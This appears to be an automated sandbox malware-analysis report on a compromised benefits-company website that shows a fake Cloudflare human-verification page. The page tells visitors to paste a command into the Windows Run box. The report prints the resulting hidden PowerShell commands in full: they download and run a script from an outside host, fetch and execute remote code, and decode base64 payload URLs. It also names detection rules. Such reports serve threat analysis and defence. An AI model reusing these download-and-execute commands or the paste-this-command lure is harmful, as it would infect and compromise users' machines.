Source: chromecache_265.1.dr, chromecache_336.1.dr, chromecache_351.1.dr, chromecache_282.1.dr String found in binary or memory: https://td.doubleclick.net/td/rul/
Source: chromecache_357.1.dr, chromecache_304.1.dr String found in binary or memory: https://techcrunch.com/2021/10/04/elevate-launches-its-approach-to-managing-pre-tax-benefits-with-12
Source: chromecache_357.1.dr, chromecache_304.1.dr String found in binary or memory: https://techcrunch.com/2023/04/13/elevate-lands-28m-to-help-employers-better-manage-benefits/
Source: chromecache_357.1.dr, chromecache_304.1.dr String found in binary or memory: https://technical.ly/2021/11/02/elevate-brian-strom/
Source: chromecache_286.1.dr, chromecache_320.1.dr, chromecache_344.1.dr, chromecache_234.1.dr, chromecache_304.1.dr, chromecache_310.1.dr, chromecache_220.1.dr, chromecache_307.1.dr String found in binary or memory: https://twitter.com/elevatedotinc
Source: chromecache_277.1.dr String found in binary or memory: https://use.typekit.net
Source: chromecache_307.1.dr String found in binary or memory: https://user.elevateaccounts.com/login
Source: chromecache_318.1.dr String found in binary or memory: https://vimeo.com/ablincoln/vuid
Source: chromecache_357.1.dr, chromecache_304.1.dr String found in binary or memory: https://www.benefitnews.com/list/3-challenges-hr-leaders-are-facing-in-todays-digital-benefits-world
Source: chromecache_357.1.dr String found in binary or memory: https://www.benefitnews.com/news/elevate-is-making-it-so-that-employees-dont-have-to-choose-between-
Source: chromecache_357.1.dr, chromecache_304.1.dr String found in binary or memory: https://www.benefitnews.com/opinion/incorporating-preventative-care-into-your-post-covid-benefits-ex
Source: chromecache_357.1.dr, chromecache_304.1.dr String found in binary or memory: https://www.benefitspro.com/2021/10/29/bringing-consumer-directed-benefits-into-the-digital-era
Source: chromecache_357.1.dr, chromecache_304.1.dr String found in binary or memory: https://www.benefitspro.com/2022/06/24/education-empowers-employees-to-better-leverage-benefits-a-lo
Source: chromecache_357.1.dr, chromecache_304.1.dr String found in binary or memory: https://www.benefitspro.com/2022/10/18/employees-are-putting-off-health-care-needs-due-to-financial-
Source: chromecache_357.1.dr, chromecache_304.1.dr String found in binary or memory: https://www.benefitspro.com/2024/09/03/ai-is-coming-to-benefits-top-3-strategies-for-hr-leaders/
Source: chromecache_357.1.dr, chromecache_320.1.dr, chromecache_344.1.dr, chromecache_234.1.dr, chromecache_304.1.dr, chromecache_310.1.dr, chromecache_220.1.dr String found in binary or memory: https://www.benefitspro.com/2024/09/10/open-enrollment-might-look-different-this-year-with-new-ai-en
Source: chromecache_357.1.dr, chromecache_304.1.dr String found in binary or memory: https://www.builtincolorado.com/2021/10/05/elevate-raises-12m-series-a-hsa-fsa-benefits-platform
Source: chromecache_304.1.dr String found in binary or memory: https://www.elevate.inc
Source: chromecache_242.1.dr String found in binary or memory: https://www.elevate.inc/blog
Source: chromecache_320.1.dr, chromecache_344.1.dr, chromecache_234.1.dr, chromecache_310.1.dr, chromecache_220.1.dr String found in binary or memory: https://www.elevate.inc/case-studies/rippling
Source: chromecache_307.1.dr String found in binary or memory: https://www.elevate.inc/component-parts
Source: chromecache_281.1.dr String found in binary or memory: https://www.elevate.inc/our-story
Source: chromecache_357.1.dr String found in binary or memory: https://www.elevate.inc/press
Source: chromecache_286.1.dr String found in binary or memory: https://www.elevate.inc/request-a-demo
Source: chromecache_309.1.dr String found in binary or memory: https://www.elevate.inc/resource-center
Source: chromecache_220.1.dr String found in binary or memory: https://www.elevate.inc/use-cases/benefit-platforms
Source: chromecache_344.1.dr String found in binary or memory: https://www.elevate.inc/use-cases/financial-institutions
Source: chromecache_320.1.dr String found in binary or memory: https://www.elevate.inc/use-cases/health-plans
Source: chromecache_234.1.dr String found in binary or memory: https://www.elevate.inc/use-cases/peo-software
Source: chromecache_310.1.dr String found in binary or memory: https://www.elevate.inc/use-cases/third-party-administrators
Source: chromecache_237.1.dr String found in binary or memory: https://www.elevate.inc/why-elevate
Source: chromecache_258.1.dr String found in binary or memory: https://www.google.com
Source: chromecache_265.1.dr, chromecache_336.1.dr, chromecache_351.1.dr, chromecache_282.1.dr, chromecache_329.1.dr, chromecache_258.1.dr String found in binary or memory: https://www.google.com/ccm/collect
Source: chromecache_258.1.dr String found in binary or memory: https://www.google.com/ccm/conversion
Source: chromecache_258.1.dr String found in binary or memory: https://www.google.com/ccm/form-data
Source: chromecache_265.1.dr, chromecache_336.1.dr, chromecache_351.1.dr, chromecache_282.1.dr, chromecache_329.1.dr, chromecache_258.1.dr String found in binary or memory: https://www.google.com/pagead/1p-conversion
Source: chromecache_354.1.dr, chromecache_222.1.dr String found in binary or memory: https://www.google.com/pagead/1p-user-list/11308007612/?random
Source: chromecache_265.1.dr, chromecache_336.1.dr, chromecache_351.1.dr, chromecache_282.1.dr, chromecache_329.1.dr, chromecache_258.1.dr String found in binary or memory: https://www.google.com/pagead/form-data
Source: chromecache_265.1.dr, chromecache_336.1.dr, chromecache_351.1.dr, chromecache_282.1.dr, chromecache_329.1.dr, chromecache_258.1.dr String found in binary or memory: https://www.google.com/travel/flights/click/conversion
Source: chromecache_282.1.dr, chromecache_329.1.dr, chromecache_258.1.dr String found in binary or memory: https://www.googleadservices.com
Source: chromecache_258.1.dr String found in binary or memory: https://www.googleadservices.com/ccm/conversion
Source: chromecache_265.1.dr, chromecache_336.1.dr, chromecache_351.1.dr, chromecache_282.1.dr, chromecache_329.1.dr, chromecache_258.1.dr String found in binary or memory: https://www.googleadservices.com/pagead/conversion
Source: chromecache_258.1.dr String found in binary or memory: https://www.googletagmanager.com
Source: chromecache_265.1.dr, chromecache_336.1.dr, chromecache_351.1.dr, chromecache_282.1.dr, chromecache_329.1.dr, chromecache_258.1.dr String found in binary or memory: https://www.googletagmanager.com/a?
Source: chromecache_281.1.dr, chromecache_309.1.dr, chromecache_242.1.dr, chromecache_357.1.dr, chromecache_286.1.dr, chromecache_320.1.dr, chromecache_344.1.dr, chromecache_234.1.dr, chromecache_237.1.dr, chromecache_304.1.dr, chromecache_310.1.dr, chromecache_220.1.dr, chromecache_307.1.dr String found in binary or memory: https://www.googletagmanager.com/gtag/js?id=G-P9P7XCFQQT
Source: chromecache_281.1.dr, chromecache_309.1.dr, chromecache_242.1.dr, chromecache_357.1.dr, chromecache_286.1.dr, chromecache_320.1.dr, chromecache_344.1.dr, chromecache_234.1.dr, chromecache_237.1.dr, chromecache_304.1.dr, chromecache_310.1.dr, chromecache_220.1.dr, chromecache_307.1.dr String found in binary or memory: https://www.googletagmanager.com/gtm.js?id=
Source: chromecache_281.1.dr, chromecache_309.1.dr, chromecache_242.1.dr, chromecache_357.1.dr, chromecache_286.1.dr, chromecache_320.1.dr, chromecache_344.1.dr, chromecache_234.1.dr, chromecache_237.1.dr, chromecache_304.1.dr, chromecache_310.1.dr, chromecache_220.1.dr, chromecache_307.1.dr String found in binary or memory: https://www.googletagmanager.com/ns.html?id=GTM-WTL5WC6F
Source: chromecache_265.1.dr, chromecache_336.1.dr, chromecache_351.1.dr, chromecache_282.1.dr, chromecache_329.1.dr, chromecache_258.1.dr String found in binary or memory: https://www.googletagmanager.com/static/service_worker/
Source: chromecache_357.1.dr String found in binary or memory: https://www.hrtechoutlook.com/news/elevate-and-visa-collaborated-to-provide-push-to-debit-health-rei
Source: chromecache_281.1.dr, chromecache_309.1.dr, chromecache_242.1.dr, chromecache_357.1.dr, chromecache_286.1.dr, chromecache_320.1.dr, chromecache_344.1.dr, chromecache_234.1.dr, chromecache_237.1.dr, chromecache_304.1.dr, chromecache_310.1.dr, chromecache_220.1.dr, chromecache_307.1.dr String found in binary or memory: https://www.instagram.com/elevatedotinc/
Source: chromecache_286.1.dr, chromecache_320.1.dr, chromecache_344.1.dr, chromecache_234.1.dr, chromecache_237.1.dr, chromecache_304.1.dr, chromecache_310.1.dr, chromecache_220.1.dr, chromecache_307.1.dr String found in binary or memory: https://www.linkedin.com/company/elevatedotinc
Source: chromecache_281.1.dr String found in binary or memory: https://www.linkedin.com/in/aliciamainoberg/
Source: chromecache_281.1.dr String found in binary or memory: https://www.linkedin.com/in/amanda-richter-4a22a5215/
Source: chromecache_281.1.dr String found in binary or memory: https://www.linkedin.com/in/bstrom/
Source: chromecache_281.1.dr String found in binary or memory: https://www.linkedin.com/in/cosgray/
Source: chromecache_281.1.dr String found in binary or memory: https://www.linkedin.com/in/keithsoranno/
Source: chromecache_281.1.dr String found in binary or memory: https://www.linkedin.com/in/scottrosecoo/
Source: chromecache_329.1.dr, chromecache_258.1.dr String found in binary or memory: https://www.merchant-center-analytics.goog
Source: chromecache_357.1.dr String found in binary or memory: https://www.prnewswire.com/news-releases/benefits-platform-elevate-raises-28m-in-growth-funding-3017
Source: chromecache_357.1.dr String found in binary or memory: https://www.prnewswire.com/news-releases/elevate-and-visa-collaborate-on-push-to-debit-health-reimbu
Source: chromecache_357.1.dr String found in binary or memory: https://www.prnewswire.com/news-releases/elevate-drivewealth-and-intellicents-partner-to-deliver-emb
Source: chromecache_357.1.dr String found in binary or memory: https://www.prnewswire.com/news-releases/elevate-honored-with-2024-hr-tech-award-for-ai-innovations-
Source: chromecache_357.1.dr String found in binary or memory: https://www.prnewswire.com/news-releases/elevate-honored-with-benefitspros-2024-luminaries-award-302
Source: chromecache_357.1.dr String found in binary or memory: https://www.prnewswire.com/news-releases/elevate-lands-more-top-flight-talent-as-several-employee-be
Source: chromecache_357.1.dr String found in binary or memory: https://www.prnewswire.com/news-releases/elevate-launches-with-15m-funding-to-modernize-consumer-dir
Source: chromecache_357.1.dr String found in binary or memory: https://www.prnewswire.com/news-releases/elevate-named-best-consumer-payments-platform-in-9th-annual
Source: chromecache_357.1.dr String found in binary or memory: https://www.prnewswire.com/news-releases/elevate-named-to-incs-2024-best-in-business-list-as-on-the-
Source: chromecache_357.1.dr String found in binary or memory: https://www.prnewswire.com/news-releases/elevate-secures-20-million-in-growth-funding-led-by-fin-cap
Source: chromecache_357.1.dr String found in binary or memory: https://www.prnewswire.com/news-releases/employee-benefit-news-names-elevates-brian-strom-as-outstan
Source: chromecache_357.1.dr String found in binary or memory: https://www.prnewswire.com/news-releases/employers-demand-ai-to-improve-benefits-administration-and-
Source: chromecache_357.1.dr String found in binary or memory: https://www.pymnts.com/partnerships/2022/elevate-teams-with-visa-on-push-to-debit-health-reimburseme
Source: powershell.exe, 00000011.00000002.1613979532.0000019151F95000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1613979532.0000019151CD1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.serranoweb.com
Source: powershell.exe, 00000011.00000002.1613503118.000001914EEA0000.00000004.00000020.00020000.00000000.sdmp, x.js.14.dr String found in binary or memory: https://www.serranoweb.com/42/504.txt
Source: wscript.exe, 00000010.00000002.1551038903.0000027EB5545000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.serranoweb.com/42/504.txtP
Source: chromecache_265.1.dr, chromecache_336.1.dr, chromecache_351.1.dr, chromecache_282.1.dr, chromecache_329.1.dr, chromecache_258.1.dr String found in binary or memory: https://www.youtube.com
Source: chromecache_329.1.dr, chromecache_258.1.dr String found in binary or memory: https://www.youtube.com/iframe_api
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49757
Source: unknown Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49755 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49756
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49753
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown Network traffic detected: HTTP traffic on port 49673 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown Network traffic detected: HTTP traffic on port 49786 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49761 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49775 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49750 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown Network traffic detected: HTTP traffic on port 49792 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown HTTPS traffic detected: 172.202.163.200:443 -> 192.168.2.16:49784 version: TLS 1.2
Source: unknown HTTPS traffic detected: 2.23.227.208:443 -> 192.168.2.16:49797 version: TLS 1.2
Source: unknown HTTPS traffic detected: 2.23.227.208:443 -> 192.168.2.16:49798 version: TLS 1.2
Source: unknown HTTPS traffic detected: 2.23.227.208:443 -> 192.168.2.16:49799 version: TLS 1.2
Source: unknown HTTPS traffic detected: 204.79.197.222:443 -> 192.168.2.16:49800 version: TLS 1.2
Source: unknown HTTPS traffic detected: 150.171.29.254:443 -> 192.168.2.16:49802 version: TLS 1.2
Source: unknown HTTPS traffic detected: 4.175.87.197:443 -> 192.168.2.16:49806 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.175.173.86:443 -> 192.168.2.16:49807 version: TLS 1.2
Source: unknown HTTPS traffic detected: 161.97.71.23:443 -> 192.168.2.16:49808 version: TLS 1.2

System Summary

Source: amsi64_1476.amsi.csv, type: OTHER Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 1476, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: C:\Windows\System32\wscript.exe COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -WindowStyle Hidden -Command "Invoke-Expression (New-Object Net.WebClient).DownloadString('"https://www.serranoweb.com/42/504.txt"')"
Source: amsi64_1476.amsi.csv, type: OTHER Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 1476, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: classification engine Classification label: mal100.phis.expl.evad.win@36/261@109/43
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6984:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2068:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kkqp2qem.1gi.ps1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File read: C:\Users\desktop.ini
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
Source: unknown Process created: C:\Windows\System32\rundll32.exe C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
Source: unknown Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2012,i,14016717888141100612,18276768270770346762,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=1556 /prefetch:3
Source: unknown Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://www.elevate.inc/"
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -ep bypass -w hidden -c "$l='https://coreun.com/wp-content/d5';$p=Join-Path $env:TEMP 'x.js';try{(New-Object Net.WebClient).DownloadFile($l,$p);Start-Process wscript -ArgumentList '//nologo',$p -WindowStyle Hidden}catch{}"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\wscript.exe "C:\Windows\system32\wscript.exe" //nologo C:\Users\user\AppData\Local\Temp\x.js
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -WindowStyle Hidden -Command "Invoke-Expression (New-Object Net.WebClient).DownloadString('"https://www.serranoweb.com/42/504.txt"')"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\System32\rundll32.exe C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: Binary string: mscorlib.pdb source: powershell.exe, 00000011.00000002.1617422054.00000191692AC000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ws\dll\System.pdb source: powershell.exe, 00000011.00000002.1617280035.0000019168FB0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.pdbs\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32A source: powershell.exe, 00000011.00000002.1617422054.00000191692AC000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: FromBase64String('aHR0cDovLzc0LjIwOC4xOTUuMTg4OjU5MjcvcGF5bG9hZA==')$e8K4p1T9 = [Convert]::FromBase64String('WC1FbmNyeXB0aW9uLUtleQ==')$e2R7v6F5 = [Convert]::FromBase64String('WC1FbmNyeXB0aW9uLUlW')$e
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -ep bypass -w hidden -c "$l='https://coreun.com/wp-content/d5';$p=Join-Path $env:TEMP 'x.js';try{(New-Object Net.WebClient).DownloadFile($l,$p);Start-Process wscript -ArgumentList '//nologo',$p -WindowStyle Hidden}catch{}"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -WindowStyle Hidden -Command "Invoke-Expression (New-Object Net.WebClient).DownloadString('"https://www.serranoweb.com/42/504.txt"')"

Persistence and Installation Behavior

Source: screenshot OCR Text: -8 x about:blank x A1-Powered Benefits Administn X elevate. inc e elevate.inc Verify you are human by completing the action below. Verification Steps Terre; ara Car.:iitions To better prove you are not a robot, please: 1. Press & hold the Windows Key + R. 2. In the verification window, press Ctrl + V. 3. Press Enter on your keyboard to finish. You will observe and agree: Cloudflare verification (Ray ID: c7d266e1222bf2e) Perform the steps above to finish Verify verificatiom Ray 10: c7d286e1222bf2e Platform performance and security Cloudflare 1855 ENG p Type here to search SG 06/06/2025
Source: Chrome DOM: 0.15 OCR Text: e elevate.inc Verify you are human by completing the action below. Verification Steps CarF1der<iaIirz Terms ar. To better prove you are not a robot, please: 1. Press & hold the Windows Key + R. 2. In the verification window, press Ctrl + V. 3. Press Enter on your keyboard to finish. You will observe and agree Cloudflare verification (Ray ID: c7d266e1222bf2e) Perform the steps above to finish Verify verificatiom Ray c7d266e1222bf2e Platform performance and security Cloudflare
Source: screenshot OCR Text: -8 about:blank x A1-Powered Benefits Administn X elevate. inc elevate.inc Verify you are human by completing the action below. Verification Steps Terre; ara Car.:iitions To better prove you are not a robot, please: 1. Press & hold the Windows Key + R. 2. In the verification window, press Ctrl + V. 3. Press Enter on your keyboard to finish. You will observe and agree: (Ray 10: c7d266e1222bf2e) Undo Cut o finish Copy Verify Paste Delete Select All Right to left Reading order x Run Show Unicode control characters Insert Unicode control character Type th open IME resourc Reconversion Open: Ray 10: c7d286e1222bf2e Platform performance and security Cloudflare 1855 ENG p Type here to search SG 06/06/2025
Source: Chrome DOM: 0.13 OCR Text: e elevate.inc Verify you are human by completing the action below. D Verification Steps CarF1der<iaIirz Terms ar. To better prove you are not a robot, please: 1. Press & hold the Windows Key + R. 2. In the verification window, press Ctrl + V. 3. Press Enter on your keyboard to finish. You will observe and agree Cloudflare verification (Ray ID: c7d266e1222bf2e) Perform the steps above to finish Verify verificatiom Ray c7d266e1222bf2e Platform performance and security Cloudflare
Source: Chrome DOM: 0.11 OCR Text: e elevate.inc Verify you are human by completing the action below. Verification Steps COrFIEertialitz Terms ard Cartiitions To better prove you are not a robot, p! 1. Press & hold the Windows Key % + R. 2. In the verification window, press Ctrl + V. 3. Press Enter on your keyboard to finish. You will observe and agree: Cloudflare verification (Ray ID: c7dZ66e12X Perform the steps above to finish verification. Ray c7d266e1222bf2e Platform performance and security Cloudflare
Source: screenshot OCR Text: -8 about:blank x A1-Powered Benefits Administn X elevate. inc elevate.inc Verify you are human by completing the action below. Verification Steps Terre; ara Car.:iitions To better prove you are not a robot, please: 1. Press & hold the Windows Key + R. 2. In the verification window, press Ctrl + V. 3. Press Enter on your keyboard to finish. You will observe and agree: Cloudflare verification (Ray ID: c7d266e1222bf2e) Perform the steps above to finish Verify verificatiom x Run Type the name of a program, folder, document or Internet resource, and Windows will open It for you. Open: Ray 10: c7d286e1222bf2e Platform performance and security Cloudflare 1855 ENG p Type here to search SG 06/06/2025
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -ep bypass -w hidden -c "$l='https://coreun.com/wp-content/d5';$p=Join-Path $env:TEMP 'x.js';try{(New-Object Net.WebClient).DownloadFile($l,$p);Start-Process wscript -ArgumentList '//nologo',$p -WindowStyle Hidden}catch{}"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 8186
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1704
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2415
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 7344
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1440 Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7988 Thread sleep time: -5534023222112862s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7060 Thread sleep time: -922337203685477s >= -30000s
Source: wscript.exe, 00000010.00000002.1551108193.0000027EB5661000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\
Source: powershell.exe, 00000011.00000002.1617422054.00000191692CC000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: powershell.exe, 0000000E.00000002.1555837232.000001CBBD730000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation

HIPS / PFW / Operating System Protection Evasion

Source: Yara match File source: amsi64_7640.amsi.csv, type: OTHER
Source: Yara match File source: dropped/chromecache_257, type: DROPPED
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -ep bypass -w hidden -c "$l='https://coreun.com/wp-content/d5';$p=Join-Path $env:TEMP 'x.js';try{(New-Object Net.WebClient).DownloadFile($l,$p);Start-Process wscript -ArgumentList '//nologo',$p -WindowStyle Hidden}catch{}"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\wscript.exe "C:\Windows\system32\wscript.exe" //nologo C:\Users\user\AppData\Local\Temp\x.js
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -WindowStyle Hidden -Command "Invoke-Expression (New-Object Net.WebClient).DownloadString('"https://www.serranoweb.com/42/504.txt"')"
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -ep bypass -w hidden -c "$l='https://coreun.com/wp-content/d5';$p=join-path $env:temp 'x.js';try{(new-object net.webclient).downloadfile($l,$p);start-process wscript -argumentlist '//nologo',$p -windowstyle hidden}catch{}"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid